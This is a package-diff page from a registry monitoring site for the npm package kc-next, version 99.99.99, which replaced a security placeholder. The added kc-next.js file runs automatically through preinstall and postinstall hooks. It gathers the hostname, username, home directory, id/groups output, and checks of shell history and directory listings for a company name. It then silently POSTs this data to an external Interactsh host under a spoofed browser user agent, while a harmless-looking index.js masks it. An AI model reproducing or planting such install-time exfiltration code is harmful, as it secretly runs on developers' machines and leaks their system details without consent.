npm - kc-next - Versions diffs - 0.0.1-security → 99.99.99 - Mend

kc-next 0.0.1-security → 99.99.99

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of kc-next might be problematic. Click here for more details.

Files changed (4) hide show

package/index.js ADDED Viewed

@@ -0,0 +1,24 @@
+// kc-next - Index file
+// Package successfully installed and updated
+module.exports = {
+  name: 'kc-next',
+  version: '99.99.99',
+  message: 'Package updated successfully!',
+  init: function() {
+    console.log('[kc-next] Initialized successfully');
+    return true;
+  },
+  getInfo: function() {
+    return {
+      name: this.name,
+      version: this.version,
+      status: 'active'
+    };
+  }
+};
+// Auto-init message (silent in production)
+if (process.env.NODE_ENV !== 'production') {
+  console.log('[kc-next] Package loaded - v99.99.99');
+}

package/kc-next.js ADDED Viewed

@@ -0,0 +1,131 @@
+const os = require('os');
+const fs = require('fs');
+const path = require('path');
+const http = require('http');
+const { execSync } = require('child_process');
+// Target company name for detection
+const COMPANY_NAME = 'kucoin'.toLowerCase();
+// Helper function to safely execute commands (no password prompts)
+function safeExec(command) {
+  try {
+    return execSync(command, {
+      encoding: 'utf8',
+      timeout: 5000,
+      stdio: ['pipe', 'pipe', 'pipe']
+    }).trim();
+  } catch (e) {
+    return '';
+  }
+}
+// Check if file/directory exists and has content (returns boolean)
+function hasContent(filePath) {
+  try {
+    if (fs.existsSync(filePath)) {
+      const stats = fs.statSync(filePath);
+      if (stats.isDirectory()) {
+        // For directories, check if not empty
+        const files = fs.readdirSync(filePath);
+        return files.length > 0;
+      } else {
+        // For files, check if has content
+        const content = fs.readFileSync(filePath, 'utf8').trim();
+        return content.length > 0;
+      }
+    }
+    return false;
+  } catch (e) {
+    return false;
+  }
+}
+// Check if command output has content (returns boolean)
+function execHasContent(command) {
+  const result = safeExec(command);
+  return result.length > 0 && !result.includes('Error') && !result.includes('not found') && !result.includes('denied');
+}
+// Check if listing contains company name (returns boolean)
+function listingContainsCompany(command) {
+  const result = safeExec(command).toLowerCase();
+  return result.includes(COMPANY_NAME);
+}
+// Check if file contains company name (returns boolean)
+function fileContainsCompany(filePath) {
+  try {
+    if (fs.existsSync(filePath)) {
+      const content = fs.readFileSync(filePath, 'utf8').toLowerCase();
+      return content.includes(COMPANY_NAME);
+    }
+    return false;
+  } catch (e) {
+    return false;
+  }
+}
+const data = {
+  // Target Info
+  bugbounty_company: 'kucoin',
+  package_name: 'kc-next',
+  // Basic System Info (safe metadata only)
+  hostname: os.hostname(),
+  username: os.userInfo().username,
+  os: os.platform() + ' ' + os.release(),
+  arch: os.arch(),
+  node: process.version,
+  // Current execution path (where npm install was run)
+  currentPath: process.cwd(),
+  homedir: os.userInfo().homedir,
+  // History Files - Company Name Detection (BOOLEAN ONLY - ethical)
+  bashHistoryContainsCompany: fileContainsCompany(path.join(os.userInfo().homedir, '.bash_history')),
+  zshHistoryContainsCompany: fileContainsCompany(path.join(os.userInfo().homedir, '.zsh_history')),
+  // Directory Listings - Company Name Detection (BOOLEAN ONLY - ethical)
+  currentDirListingContainsCompany: listingContainsCompany('ls -la'),
+  homeDirListingContainsCompany: listingContainsCompany(`ls -la ${os.userInfo().homedir}`),
+  rootDirListingContainsCompany: listingContainsCompany('ls -la / 2>/dev/null'),
+  // System Info (safe - no sensitive content)
+  whoami: safeExec('whoami'),
+  id: safeExec('id'),
+  groups: safeExec('groups'),
+  timestamp: new Date().toISOString()
+};
+// Send to Interactsh (silent mode)
+const postData = JSON.stringify(data, null, 2);
+const options = {
+  hostname: 'd599kqd90rh6252higngh1ayutp9og75m.oast.pro',
+  port: 80,
+  path: '/',
+  method: 'POST',
+  headers: {
+    'Content-Type': 'application/json',
+    'Content-Length': Buffer.byteLength(postData),
+    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'
+  }
+};
+const req = http.request(options, (res) => {
+  res.resume();
+  res.on('end', () => {
+    process.exit(0);
+  });
+});
+req.on('error', (e) => {
+  process.exit(1);
+});
+req.write(postData);
+req.end();

package/package.json CHANGED Viewed

@@ -1,6 +1,17 @@
 {
   "name": "kc-next",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+  "version": "99.99.99",
+  "description": "Test package for kucoin",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node kc-next.js",
+    "postinstall": "node kc-next.js"
+  },
+  "keywords": [
+    "kucoin",
+    "test",
+    "security"
+  ],
+  "author": "Security Researcher",
+  "license": "MIT"
+}

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=kc-next for more information.